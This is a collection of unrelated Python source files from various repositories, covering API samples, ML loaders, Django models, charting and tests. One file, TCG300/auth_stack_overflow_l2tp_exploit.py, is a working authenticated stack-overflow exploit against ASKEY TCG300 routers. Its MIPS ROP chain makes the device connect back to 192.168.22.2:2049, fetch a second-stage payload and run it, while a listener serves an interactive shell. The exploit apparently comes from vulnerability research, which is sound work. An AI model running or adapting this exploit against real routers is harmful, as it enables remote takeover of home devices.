path_spec = os_path_spec.OSPathSpec(location=test_file)
self._raw_path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
def testOpenCloseInode(self):
"""Test the open and close functionality using an inode."""
self._TestOpenCloseInode(self._raw_path_spec)
def testOpenCloseLocation(self):
"""Test the open and close functionality using a location."""
self._TestOpenCloseLocation(self._raw_path_spec)
def testSeek(self):
"""Test the seek functionality."""
self._TestSeek(self._raw_path_spec)
def testRead(self):
"""Test the read functionality."""
self._TestRead(self._raw_path_spec)
if __name__ == '__main__':
unittest.main()
| 2.671875 | 3 |
folders-cli/sample.py | mark-b-kauffman/panopto-api-python-examples | 7 | 12761568 | <gh_stars>1-10
#!python3
import sys
import argparse
import requests
import urllib3
from panopto_folders import PanoptoFolders
from os.path import dirname, join, abspath
sys.path.insert(0, abspath(join(dirname(__file__), '..', 'common')))
from panopto_oauth2 import PanoptoOAuth2
# Top level folder is represented by zero GUID.
# However, it is not the real folder and some API beahves differently than actual folder.
GUID_TOPLEVEL = '00000000-0000-0000-0000-000000000000'
def parse_argument():
parser = argparse.ArgumentParser(description='Sample of Folders API')
parser.add_argument('--server', dest='server', required=True, help='Server name as FQDN')
parser.add_argument('--client-id', dest='client_id', required=True, help='Client ID of OAuth2 client')
parser.add_argument('--client-secret', dest='client_secret', required=True, help='Client Secret of OAuth2 client')
parser.add_argument('--skip-verify', dest='skip_verify', action='store_true', required=False, help='Skip SSL certificate verification. (Never apply to the production code)')
return parser.parse_args()
def main():
args = parse_argument()
if args.skip_verify:
# This line is needed to suppress annoying warning message.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Use requests module's Session object in this example.
# ref. https://2.python-requests.org/en/master/user/advanced/#session-objects
requests_session = requests.Session()
requests_session.verify = not args.skip_verify
# Load OAuth2 logic
oauth2 = PanoptoOAuth2(args.server, args.client_id, args.client_secret, not args.skip_verify)
# Load Folders API logic
folders = PanoptoFolders(args.server, not args.skip_verify, oauth2)
current_folder_id = GUID_TOPLEVEL
while True:
print('----------------------------')
current_folder = get_and_display_folder(folders, current_folder_id)
sub_folders = get_and_display_sub_folders(folders, current_folder_id)
current_folder_id = process_selection(folders, current_folder, sub_folders)
def get_and_display_folder(folders, folder_id):
'''
Returning folder object that is returned by API.
None if it is top level folder.
'''
print()
print('Folder:')
if folder_id == GUID_TOPLEVEL:
print(' Top level folder (no detail informaiton is available)')
return None
folder = folders.get_folder(folder_id)
print(' Name: {0}'. format(folder['Name']))
print(' Id: {0}'. format(folder['Id']))
if folder['ParentFolder'] is None:
print(' Parent Folder: Top level folder')
else:
print(' Parent Folder: {0}'. format(folder['ParentFolder']['Name']))
print(' Folder URL: {0}'. format(folder['Urls']['FolderUrl']))
print(' Embed URL: {0}'. format(folder['Urls']['EmbedUrl']))
print(' Share settings URL: {0}'. format(folder['Urls']['ShareSettingsUrl']))
return folder
def get_and_display_sub_folders(folders, current_folder_id):
print()
print('Sub Folders:')
children = folders.get_children(current_folder_id)
# returning object is the dictionary, key (integer) and folder's ID (UUID)
result = {}
key = 0
for entry in children:
result[key] = entry['Id']
print(' [{0}]: {1}'.format(key, entry['Name']))
key += 1
return result
def process_selection(folders, current_folder, sub_folders):
if current_folder is None:
new_folder_id = GUID_TOPLEVEL
parent_folder_id = GUID_TOPLEVEL
else:
new_folder_id = current_folder['Id']
if current_folder['ParentFolder'] is None:
parent_folder_id = GUID_TOPLEVEL
else:
parent_folder_id = current_folder['ParentFolder']['Id']
print()
print('[P] Go to parent')
print('[R] Rename this folder')
print('[D] Delete this folder')
print('[S] Search folders')
print('[L] List sessions in the folder')
print()
selection = input('Enter the command (select number to move folder): ')
try:
key = int(selection)
if sub_folders[key]:
return sub_folders[key]
except:
pass # selection is not a number, fall through
if selection.lower() == 'p':
new_folder_id = parent_folder_id
elif selection.lower() == 'r' and current_folder is not None:
rename_folder(folders, current_folder)
elif selection.lower() == 'd' and current_folder is not None:
if delete_folder(folders, current_folder):
new_folder_id = parent_folder_id
elif selection.lower() == 's':
result = search_folder(folders)
if result is not None:
new_folder_id = result
elif selection.lower() == 'l' and current_folder is not None:
list_sessions(folders, current_folder)
else:
print('Invalid command.')
return new_folder_id
def rename_folder(folders, folder):
new_name = input('Enter new name: ')
return folders.update_folder_name(folder['Id'], new_name)
def delete_folder(folders, folder):
return folders.delete_folder(folder['Id'])
def search_folder(folders):
query = input('Enter search keyword: ')
entries = folders.search_folders(query)
if len(entries) == 0:
print(' No hit.')
return None
for index in range(len(entries)):
print(' [{0}]: {1}'.format(index, entries[index]['Name']))
selection = input('Enter the number (or just enter to stay current): ')
new_folder_id = None
try:
index = int(selection)
if 0 <= index < len(entries):
new_folder_id = entries[index]['Id']
except:
pass
return new_folder_id
def list_sessions(folders, folder):
print('Sessions in the folder:')
for entry in folders.get_sessions(folder['Id']):
print(' {0}: {1}'.format(entry['Id'], entry['Name']))
if __name__ == '__main__':
main()
| 2.578125 | 3 |
code/create-tinsley.py | diaaalfar/web-app-python | 7 | 12761569 | <gh_stars>1-10
import jinja2
loader = jinja2.FileSystemLoader(['.'])
environment = jinja2.Environment(loader=loader)
template = environment.get_template('biography.html')
who = '<NAME>'
what = ['Born 1941', 'Died 1981', 'Studied stellar aging']
result = template.render(name=who, facts=what)
print result
| 2.796875 | 3 |
#100DaysOfCode/96_Day/pdfExercise03.py | jpromanonet/codeChallenges | 0 | 12761570 | # Third exercise using PDF libraries in Python
# Importing libraries and frameworks
import PyPDF2
# Defining Global Variables
pdf1File = open('meetingminutes.pdf', 'rb')
pdf2File = open('meetingminutes2.pdf', 'rb')
pdf1Reader = PyPDF2.PdfFileReader(pdf1File)
pdf2Reader = PyPDF2.PdfFileReader(pdf2File)
# Program logic
pdfWriter = PyPDF2.PdfFileWriter()
for pageNum in range(pdf1Reader.numPages):
pageObject = pdf1Reader.getPage(pageNum)
pdfWriter.addPage(pageObject)
for pageNum in range(pdf2Reader.numPages):
pageObject = pdf2Reader.getPage(pageNum)
pdfWriter.addPage(pageObject)
pdfOutputFile = open('combinedminutes.pdf', 'wb')
pdfWriter.write(pdfOutputFile)
pdfOutputFile.close()
pdf1File.close()
pdf2File.close() | 3.578125 | 4 |
pinn/io/base.py | FZJ-IAS5-MLMD/PiNN | 0 | 12761571 | <gh_stars>0
# -*- coding: utf-8 -*-
"""Basic functions for dataset loaders"""
import random
import tensorflow as tf
class _datalist(list):
"""The same thing as list, but don't count in nested structure
"""
pass
def sparse_batch(batch_size, drop_remainder=False, num_parallel_calls=8,
atomic_props=['f_data', 'q_data', 'f_weights']):
"""This returns a dataset operation that transforms single samples
into sparse batched samples. The atomic_props must include all
properties that are defined on an atomic basis besides 'coord' and
'elems'.
Args:
drop_remainder (bool): option for padded_batch
num_parallel_calls (int): option for map
atomic_props (list): list of atomic properties
"""
def sparsify(tensors):
atom_ind = tf.cast(tf.where(tensors['elems']), tf.int32)
ind_1 = atom_ind[:, :1]
ind_sp = tf.cumsum(tf.ones(tf.shape(ind_1), tf.int32))-1
tensors['ind_1'] = ind_1
elems = tf.gather_nd(tensors['elems'], atom_ind)
coord = tf.gather_nd(tensors['coord'], atom_ind)
tensors['elems'] = elems
tensors['coord'] = coord
# Optional
for name in atomic_props:
if name in tensors:
tensors[name] = tf.gather_nd(tensors[name], atom_ind)
return tensors
return lambda dataset: \
dataset.padded_batch(batch_size, dataset.output_shapes,
drop_remainder=drop_remainder).map(
sparsify, num_parallel_calls)
def map_nested(fn, nested):
"""Map fn to the nested structure
"""
if isinstance(nested, dict):
return {k: map_nested(fn, v) for k, v in nested.items()}
if isinstance(nested, list) and type(nested) != _datalist:
return [map_nested(fn, v) for v in nested]
else:
return fn(nested)
def flatten_nested(nested):
"""Retun a list of the nested elements
"""
if isinstance(nested, dict):
return sum([flatten_nested(v) for v in nested.values()], [])
if isinstance(nested, list) and type(nested) != _datalist:
return sum([flatten_nested(v) for v in nested], [])
else:
return [nested]
def split_list(data_list, split={'train': 8, 'vali': 1, 'test': 1},
shuffle=True, seed=None):
"""
Split the list according to a given ratio
Args:
to_split (list): a list to split
split_ratio: a nested (list and dict) of split ratio
Returns:
A nest structure of splitted data list
"""
import math
dummy = _datalist(data_list)
if shuffle:
random.seed(seed)
random.shuffle(dummy)
data_tot = len(dummy)
split_tot = float(sum(flatten_nested(split)))
def get_split_num(x): return math.ceil(data_tot*x/split_tot)
split_num = map_nested(get_split_num, split)
def _pop_data(n):
to_pop = dummy[:n]
del dummy[:n]
return _datalist(to_pop)
splitted = map_nested(_pop_data, split_num)
return splitted
def list_loader(pbc=False, force=False, format_dict=None):
"""Decorator for building dataset loaders"""
from functools import wraps
if format_dict is None:
format_dict = {
'elems': {'dtype': tf.int32, 'shape': [None]},
'coord': {'dtype': tf.float32, 'shape': [None, 3]},
'e_data': {'dtype': tf.float32, 'shape': []},
}
if pbc:
format_dict['cell'] = {'dtype': tf.float32, 'shape': [3, 3]}
if force:
format_dict['f_data'] = {'dtype': tf.float32, 'shape': [None, 3]}
def decorator(func):
@wraps(func)
def data_loader(data_list, split={'train': 8, 'vali': 1, 'test': 1},
shuffle=True, seed=0):
def _data_generator(data_list):
for data in data_list:
yield func(data)
dtypes = {k: v['dtype'] for k, v in format_dict.items()}
shapes = {k: v['shape'] for k, v in format_dict.items()}
def generator_fn(data_list): return tf.data.Dataset.from_generator(
lambda: _data_generator(data_list), dtypes, shapes)
subsets = split_list(data_list, split, shuffle, seed)
splitted = map_nested(generator_fn, subsets)
return splitted
return data_loader
return decorator
| 2.59375 | 3 |
TCG300/auth_stack_overflow_l2tp_exploit.py | ecos-wtf/ecosploits | 5 | 12761572 | <filename>TCG300/auth_stack_overflow_l2tp_exploit.py
#!/usr/bin/env python3
'''
This script demonstrates an authenticated remote code execution flaw
affecting ASKEY TCG300 (aka Siligence TCG300) deployed by Orange Belgium.
Upon exploitation, the device will connect to 192.168.22.2:2049 to pull
a second stage payload (removed here).
Author: <NAME> <<EMAIL>>
'''
import string
import requests
import re
from requests.auth import HTTPBasicAuth
import sys
import struct
from pwn import *
from threading import Thread
def handler():
with open('rop_stage2.bin', 'rb') as f:
shellcode = f.read()
l = listen(2049, '0.0.0.0')
c = l.wait_for_connection()
print("[+] Got connection. Sending payload.")
l.sendline(shellcode)
l.interactive()
def pad(length):
return randoms(length).encode('utf-8')
def build_payload():
context.endian = 'big'
debug_addr = 0x99999999
hardcoded_afinet = 0x81916fd8 # tcp/2049
socket_addr = 0x80e936d0
connect_addr = 0x80e93abc
recv_addr = 0x80e9418c
sleep_addr = 0x80e90608
sockfd_addr = 0x86705fd0
sockaddr_addr = 0x867dade4 # IkeThread stack address
payload_buffer_addr = 0x867dade4 + 0x64
payload = b""
payload += pad(314)
# -------------------------------------
# socket(2, 1, 0)
# -------------------------------------
payload += p32(0x80dea1c8)
# 0x80dea1c8: addiu $a0, $zero, 2; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(8)
payload += p32(0x80f20198)
# 0x80f20198: addiu $a1, $zero, 1; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(0x80e65808)
# 0x80e65808: move $a2, $zero; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += p32(socket_addr)
payload += p32(socket_addr)
payload += p32(socket_addr)
payload += p32(0x80737ea4)
# 0x80737ea4: lw $v0, 4($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0x10)
payload += p32(socket_addr)
payload += pad(0x8)
payload += p32(0x80d9fd2c)
# 0x80d9fd2c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
# ---------------------------------------
# connect(sockfd, sockaddr_in, socklen)
# ---------------------------------------
payload += pad(0x10)
payload += p32(0x800669e4)
# 0x800669e4: lw $ra, 4($sp); lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0x8)
payload += p32(sockfd_addr - 0x4) # $s0
payload += p32(0x80bf878c) # $ra
# 0x80bf878c: sw $v0, 4($s0); lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(0x80cf6080)
# 0x80cf6080: move $a0, $v0; lw $ra, ($sp); move $v0, $a0; jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0x8)
payload += p32(0x80e4d5c4)
# 0x80e4d5c4: lw $a2, ($sp); lw $ra, 0x18($sp); lw $s1, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0xc)
payload += p32(0x20202020) # $a2
payload += pad(0xc)
payload += p32(hardcoded_afinet) # $s0
payload += p32(sockaddr_addr) # $s1
payload += p32(0x80e06398)
# load value from hardcoded_afinet ($s0) into $v0
# 0x80e06398: lw $v0, ($s0); lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0x8)
payload += p32(0x80865478)
# store value from $v0 (hardcoded_afinet) into address $s1 (sockaddr_addr)
# 0x80865478: sw $v0, ($s1); lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(sockaddr_addr + 0x04) # sockaddr_addr + offset to put IP
payload += p32(0x80e341cc)
# 0x80e341cc: lw $v0, ($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0x4)
payload += struct.pack('>BBBB', 192, 168, 22, 2)
#--works--
payload += pad(0xc)
# 0x80865478: sw $v0, ($s1); lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += p32(0x80865478)
payload += pad(0xc)
payload += p32(sockaddr_addr) #$s1
payload += p32(sockaddr_addr) # $s0
payload += p32(0x8030c73c)
# 0x8030c73c: move $a1, $s0; andi $v0, $v0, 0xff; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;'))
payload += pad(0x8)
payload += p32(0x80737ea4)
# 0x80737ea4: lw $v0, 4($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0xc)
payload += p32(connect_addr)
payload += pad(0x8)
payload += p32(0x80d9fd2c)
# 0x80d9fd2c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
# ----------------------------------------------------
# recv(int sockfd, void *buf, size_t len, int flags);
# ----------------------------------------------------
payload += pad(0x10)
payload += p32(0x8082df90)
# 0x8082df90: lw $a1, 4($sp); lw $ra, 0x14($sp); lw $s0, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0xc)
payload += p32(payload_buffer_addr)
#payload += pad(0x8)
payload += pad(0xc)
payload += p32(0x80b6ff18)
# 0x80b6ff18: addiu $a2, $zero, 0x400; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(0x80f10f24)
# 0x80f10f24: move $a3, $zero; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0x8)
payload += p32(0x800741cc)
# 0x800741cc: nop; lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(sockfd_addr) # $s0
payload += pad(0x4) # $s1
payload += p32(0x80dd01d4) # $ra
# 0x80dd01d4: lw $a0, ($s0); lw $ra, 8($sp); lw $s1, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0xc)
payload += p32(0x80737ea4) # $ra
# 0x80737ea4: lw $v0, 4($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0x8)
payload += p32(recv_addr)
payload += pad(0x8)
payload += p32(0x80d9fd2c)
# 0x80d9fd2c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
# call recv($a0, $a1, $a2, $a3)
# ----------------------------------------
# sleep(2)
# ----------------------------------------
payload += pad(0x10)
payload += p32(0x80dea1c8)
# 0x80dea1c8: addiu $a0, $zero, 2; lw $ra, ($sp); jr $ra; addiu $sp, $sp, 0x10;
payload += pad(0x8)
payload += p32(0x80737ea4)
# 0x80737ea4: lw $v0, 4($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;'))
payload += pad(0x10)
payload += p32(sleep_addr)
payload += pad(0x8)
payload += p32(0x80d9fd2c)
# 0x80d9fd2c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;
# ------------------------------------------
# jump to shellcode
# ------------------------------------------
payload += pad(0x10)
payload += p32(0x80737ea4)
# 0x80737ea4: lw $v0, 4($sp); lw $ra, 0x10($sp); jr $ra; addiu $sp, $sp, 0x20;
payload += pad(0xc)
payload += p32(payload_buffer_addr)
payload += pad(0x8)
payload += p32(0x80d9fd2c)
# 0x80d9fd2c: jalr $v0; nop; lw $ra, 4($sp); lw $s0, ($sp); jr $ra; addiu $sp, $sp, 0x10;'))
payload += pad(0xc)
payload += p32(payload_buffer_addr)
payload += p32(payload_buffer_addr)
# --- At this point, we're executing the received payload from the remote server
return payload
def login(username="admin", password="<PASSWORD>"):
response = requests.post(
"http://192.168.0.1/goform/AskLogin",
data = {
"AskUsername":username,
"AskPassword":password
},
allow_redirects=False
)
return response.headers['Location'] == "/overview.asp"
def exploit():
try:
requests.post(
"http://192.168.0.1/goform/AskVPNL2TP",
data={
"PPPStartIp0":10,
"PPPStartIp1":0,
"PPPStartIp2":0,
"PPPStartIp3":1,
"PPPEndIp0":10,
"PPPEndIp1":0,
"PPPEndIp2":0,
"PPPEndIp3":254,
"AskMPPEValue":1,
"AskVPNIPSecValue":0,
"L2TPuser2":build_payload(),
"L2TPPassword0":"A",
"L2TPPresharedPhrase":"A"
},
allow_redirects=False,
timeout=2
)
except Exception as e:
# handle inevitable timeout
return
if __name__ == "__main__":
if login():
print("[+] Login successful.")
print("[+] Launching reverse shell handler.")
handlerthr = Thread(target=handler)
handlerthr.start()
print("[+] Sending exploit payload.")
exploit()
else:
print("[!] An error occured.")
| 2.25 | 2 |
rnacentral/portal/models/taxonomy.py | RNAcentral/rnacentral-webcode | 21 | 12761573 | <reponame>RNAcentral/rnacentral-webcode<gh_stars>10-100
"""
Copyright [2009-2019] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from caching.base import CachingMixin, CachingManager
from django.db import models
class Taxonomy(CachingMixin, models.Model):
id = models.IntegerField(primary_key=True)
name = models.TextField()
lineage = models.TextField()
aliases = models.TextField()
replaced_by = models.ForeignKey('self', db_column='replaced_by', on_delete=models.CASCADE)
common_name = models.TextField()
is_deleted = models.BooleanField()
objects = CachingManager()
class Meta:
db_table = 'rnc_taxonomy'
| 1.75 | 2 |
setup.py | recruit-tech/aris-awsiotcore-to-nav2 | 0 | 12761574 | from setuptools import setup
package_name = 'awsiotcore_to_navigation2'
setup(
name=package_name,
version='0.1.0',
packages=[package_name],
data_files=[
('share/ament_index/resource_index/packages',
['resource/' + package_name]),
('share/' + package_name, ['package.xml']),
],
install_requires=['setuptools'],
zip_safe=True,
maintainer='<NAME>',
maintainer_email='<EMAIL>',
description='Receive positional information '
'from AWS IoT Core and send it to Navigation2',
license='MIT',
tests_require=['pytest'],
entry_points={
'console_scripts': [
'iotcore_to_nav2 = '
'awsiotcore_to_navigation2.awsiotcore_to_nav2_node:main'
],
},
)
| 1.640625 | 2 |
ml/sklearn/dendrogram.py | alexnakagawa/tools | 0 | 12761575 | '''
This is an example of a dendrogram plot showing the hierarchical structure of clustering.
Inspired from the "Unsupervised Learning" course on Datacamp.com
Author: <NAME>
'''
# Import normalize
from sklearn.preprocessing import normalize
# Normalize the movements: normalized_movements
normalized_movements = normalize(movements)
# Calculate the linkage: mergings
mergings = linkage(normalized_movements, 'complete')
# Plot the dendrogram
dendrogram(mergings, labels=companies, leaf_rotation=90, leaf_font_size=6)
plt.show()
| 3.328125 | 3 |
TestPrograms/PyQt/PyQt5_QML_CV2/PyCVQML/__init__.py | BA-OST-2022/audio-beamformer-software | 0 | 12761576 | from PyQt5 import QtQml
from .cvcapture import CVCapture, CVAbstractFilter
from .cvitem import CVItem
def registerTypes(uri = "PyCVQML"):
QtQml.qmlRegisterType(CVCapture, uri, 1, 0, "CVCapture")
QtQml.qmlRegisterType(CVItem, uri, 1, 0, "CVItem")
def stopCamera():
CVCapture.stopCamera() | 2.109375 | 2 |
Bar/bar_border_radius.py | pyecharts/pyecharts_gallery | 759 | 12761577 | from pyecharts import options as opts
from pyecharts.charts import Bar
from pyecharts.commons.utils import JsCode
from pyecharts.faker import Faker
c = (
Bar()
.add_xaxis(Faker.choose())
.add_yaxis("商家A", Faker.values(), category_gap="60%")
.set_series_opts(
itemstyle_opts={
"normal": {
"color": JsCode(
"""new echarts.graphic.LinearGradient(0, 0, 0, 1, [{
offset: 0,
color: 'rgba(0, 244, 255, 1)'
}, {
offset: 1,
color: 'rgba(0, 77, 167, 1)'
}], false)"""
),
"barBorderRadius": [30, 30, 30, 30],
"shadowColor": "rgb(0, 160, 221)",
}
}
)
.set_global_opts(title_opts=opts.TitleOpts(title="Bar-渐变圆柱"))
.render("bar_border_radius.html")
)
| 2.265625 | 2 |
gwinpy/net/dhcp_test.py | google/winops | 82 | 12761578 | <gh_stars>10-100
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for gwinpy.net.dhcp."""
import struct
import unittest
import mock
from gwinpy.net import dhcp
class DhcpTest(unittest.TestCase):
@mock.patch.object(dhcp.socket, 'socket')
@mock.patch.object(dhcp, '_OptScan', autospec=True)
def testGetDhcpOption(self, optscan, socket):
optscan.return_value = None
result = dhcp.GetDhcpOption('192.168.0.1', '11:22:33:44:55:66', 102)
self.assertEqual(None, result)
optscan.return_value = 'America/Chicago'
result = dhcp.GetDhcpOption('192.168.0.2', '11:22:33:44:55:66', 101)
self.assertEqual('America/Chicago', result)
socket.return_value.recv.side_effect = dhcp.socket.timeout
result = dhcp.GetDhcpOption(
'192.168.0.2',
'11:22:33:44:55:66',
101,
server_addr='10.0.0.1',
socket_timeout=5)
socket.return_value.sendto.assert_called_with(mock.ANY, ('10.0.0.1', 67))
socket.return_value.settimeout.assert_called_with(5)
self.assertEqual(None, result)
# bad mac
result = dhcp.GetDhcpOption(
'192.168.0.2', None, 101, server_addr='10.0.0.1', socket_timeout=5)
# bad ip
self.assertEqual(None, result)
result = dhcp.GetDhcpOption(
None,
'11:22:33:44:55:66',
101,
server_addr='10.0.0.1',
socket_timeout=5)
self.assertEqual(None, result)
def testOptScan(self):
options = struct.pack('BBBB', 12, 2, 10, 13)
options += struct.pack('BBB', 40, 1, 1)
options += struct.pack('BBBBB', 120, 3, 8, 28, 15)
options += struct.pack('B', 255)
result = dhcp._OptScan(options, 120)
self.assertEqual(result, b'\x08\x1c\x0f')
result = dhcp._OptScan(options, 121)
self.assertEqual(result, None)
def testZeroFill(self):
result = list(dhcp._ZeroFill(10))
self.assertEqual(len(result), 10)
for i in result:
self.assertEqual(b'\x00', i)
if __name__ == '__main__':
unittest.main()
| 2.015625 | 2 |
src/spaceone/monitoring/model/data_source_response_model.py | xellos00/plugin-aws-cloudwatch | 2 | 12761579 | <filename>src/spaceone/monitoring/model/data_source_response_model.py
from schematics.models import Model
from schematics.types import ListType, DictType, StringType
from schematics.types.compound import ModelType
__all__ = ['PluginInitResponse']
_SUPPORTED_RESOURCE_TYPE = [
'inventory.Server',
'inventory.CloudService'
]
_SUPPORTED_STAT = [
'AVERAGE',
'MAX',
'MIN',
'SUM'
]
_REFERENCE_KEYS = [
{
'resource_type': 'inventory.Server',
'reference_key': 'data.cloudwatch'
}, {
'resource_type': 'inventory.CloudService',
'reference_key': 'data.cloudwatch'
}
]
_REQUIRED_KEYS = ['data.cloudwatch']
class ReferenceKeyModel(Model):
resource_type = StringType(required=True, choices=_SUPPORTED_RESOURCE_TYPE)
reference_key = StringType(required=True)
class PluginMetadata(Model):
supported_resource_type = ListType(StringType, default=_SUPPORTED_RESOURCE_TYPE)
supported_stat = ListType(StringType, default=_SUPPORTED_STAT)
required_keys = ListType(StringType, default=_REQUIRED_KEYS)
class PluginInitResponse(Model):
_metadata = ModelType(PluginMetadata, default=PluginMetadata, serialized_name='metadata')
| 1.921875 | 2 |
文本生成/lstm/train.py | zhangdddong/beautifulNLP | 10 | 12761580 | <gh_stars>1-10
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
# @license : Copyright(C), Your Company
# @Author: <NAME>
# @Contact : <EMAIL>
# @Date: 2020-07-18 20:15
# @Description: In User Settings Edit
# @Software : PyCharm
import tensorflow as tf
from read_utils import TextConverter, batch_generator
from model import CharRNN
import os
import codecs
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string('name', 'base', 'name of the model')
tf.flags.DEFINE_integer('num_seqs', 100, 'number of seqs in one batch')
tf.flags.DEFINE_integer('num_steps', 100, 'length of one seq')
tf.flags.DEFINE_integer('lstm_size', 128, 'size of hidden state of lstm')
tf.flags.DEFINE_integer('num_layers', 2, 'number of lstm layers')
tf.flags.DEFINE_boolean('use_embedding', False, 'whether to use embedding')
tf.flags.DEFINE_integer('embedding_size', 128, 'size of embedding')
tf.flags.DEFINE_float('learning_rate', 0.001, 'learning_rate')
tf.flags.DEFINE_float('train_keep_prob', 0.5, 'dropout rate during training')
tf.flags.DEFINE_string('input_file', 'data/poetry.txt', 'utf8 encoded text file')
tf.flags.DEFINE_integer('max_steps', 100000, 'max steps to train')
tf.flags.DEFINE_integer('save_every_n', 1000, 'save the model every n steps')
tf.flags.DEFINE_integer('log_every_n', 10, 'log to the screen every n steps')
tf.flags.DEFINE_integer('max_vocab', 3500, 'max char number')
def main(_):
model_path = os.path.join('checkpoint', FLAGS.name)
if os.path.exists(model_path) is False:
os.makedirs(model_path)
with codecs.open(FLAGS.input_file, encoding='utf-8') as f:
text = f.read()
converter = TextConverter(text, FLAGS.max_vocab)
converter.save_to_file(os.path.join(model_path, 'converter.pkl'))
arr = converter.text_to_arr(text)
g = batch_generator(arr, FLAGS.num_seqs, FLAGS.num_steps)
print(converter.vocab_size)
model = CharRNN(
converter.vocab_size,
num_seqs=FLAGS.num_seqs,
num_steps=FLAGS.num_steps,
lstm_size=FLAGS.lstm_size,
num_layers=FLAGS.num_layers,
learning_rate=FLAGS.learning_rate,
train_keep_prob=FLAGS.train_keep_prob,
use_embedding=FLAGS.use_embedding,
embedding_size=FLAGS.embedding_size
)
model.train(
g,
FLAGS.max_steps,
model_path,
FLAGS.save_every_n,
FLAGS.log_every_n,
)
if __name__ == '__main__':
tf.app.run()
| 2.265625 | 2 |
commentary/views/moderation.py | mangadventure/django-user-comments | 0 | 12761581 | <filename>commentary/views/moderation.py<gh_stars>0
from django.contrib.auth.decorators import login_required, permission_required
from django.contrib.sites.shortcuts import get_current_site
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404, render
from django.views.decorators.csrf import csrf_protect
from commentary import get_model, models, signals
def next_redirect(request, next=None):
return HttpResponseRedirect(
next or request.POST.get('next') or
request.META.get('HTTP_REFERER', '/')
)
@csrf_protect
@login_required
def flag(request, comment_id, next=None):
"""
Flags a comment. Confirmation on GET, action on POST.
Templates: :template:`comments/flag.html`,
Context:
comment
the flagged `comments.comment` object
"""
comment = get_object_or_404(
get_model(), pk=comment_id,
site__pk=get_current_site(request).pk
)
# Flag on POST
if request.method == 'POST':
perform_flag(request, comment)
return next_redirect(request, next)
return render(request, 'comments/flag.html', {
'comment': comment, 'next': next
})
@csrf_protect
@login_required
@permission_required('commentary.can_moderate')
def delete(request, comment_id, next=None):
"""
Deletes a comment. Confirmation on GET, action on POST. Requires the "can
moderate comments" permission.
Templates: :template:`comments/delete.html`,
Context:
comment
the flagged `comments.comment` object
"""
comment = get_object_or_404(
get_model(), pk=comment_id,
site__pk=get_current_site(request).pk
)
# Delete on POST
if request.method == 'POST':
# Flag the comment as deleted instead of actually deleting it.
perform_delete(request, comment)
return next_redirect(request, next)
return render(request, 'comments/delete.html', {
'comment': comment, 'next': next
})
@csrf_protect
@login_required
@permission_required("commentary.can_moderate")
def approve(request, comment_id, next=None):
"""
Approve a comment (that is, mark it as public and non-removed). Confirmation
on GET, action on POST. Requires the "can moderate comments" permission.
Templates: :template:`comments/approve.html`,
Context:
comment
the `comments.comment` object for approval
"""
comment = get_object_or_404(
get_model(), pk=comment_id,
site__pk=get_current_site(request).pk
)
# Approve on POST
if request.method == 'POST':
# Flag the comment as approved.
perform_approve(request, comment)
return next_redirect(request, next)
return render(request, 'comments/approve.html', {
'comment': comment, 'next': next
})
# The following functions actually perform the various flag/aprove/delete
# actions. They've been broken out into separate functions to that they
# may be called from admin actions.
def perform_flag(request, comment):
"""
Actually perform the flagging of a comment from a request.
"""
